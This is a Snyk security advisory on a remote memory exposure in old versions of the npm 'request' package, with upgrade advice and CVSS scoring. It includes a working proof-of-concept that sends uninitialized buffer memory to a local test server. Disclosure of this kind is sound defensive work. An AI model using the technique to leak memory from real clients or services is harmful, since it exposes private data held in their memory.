Remote Memory Exposure Affecting request package, versions >2.2.5 <2.68.0


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    EPSS
    0.19% (57th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID npm:request:20160119
  • published 22 Mar 2016
  • disclosed 19 Jan 2016
  • credit Feross Aboukhadijeh

How to fix?

Upgrade request to version 2.68.0 or higher.

Overview

request is a simplified http request client.

Affected versions of this package are vulnerable to Remote Memory Exposure. A potential remote memory exposure vulnerability exists in request. If a request uses a multipart attachment and the body type option is number with value X, then X bytes of uninitialized memory will be sent in the body of the request.

Note that while the impact of this vulnerability is high (memory exposure), exploiting it is likely difficult, as the attacker needs to somehow control the body type of the request. One potential exploit scenario is when a request is composed based on JSON input, including the body type, allowing a malicious JSON to trigger the memory leak.

Details

Constructing a Buffer class with integer N creates a Buffer of length N with non zero-ed out memory. Example:

var x = new Buffer(100); // uninitialized Buffer of length 100
// vs
var x = new Buffer('100'); // initialized Buffer with value of '100'

Initializing a multipart body in such manner will cause uninitialized memory to be sent in the body of the request.

Proof of concept

var http = require('http')
var request = require('request')

http.createServer(function (req, res) { var data = '' req.setEncoding('utf8') req.on('data', function (chunk) { console.log('data') data += chunk }) req.on('end', function () { // this will print uninitialized memory from the client console.log('Client sent:\n', data) }) res.end() }).listen(8000)

request({ method: 'POST', uri: 'http://localhost:8000&#39;, multipart: [{ body: 1000 }] }, function (err, res, body) { if (err) return console.error('upload failed:', err) console.log('sent') })

CVSS Scores

version 3.1
Expand this section

Snyk

5.1 medium
  • Attack Vector (AV)
    Local
  • Attack Complexity (AC)
    High
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    None
  • Availability (A)
    None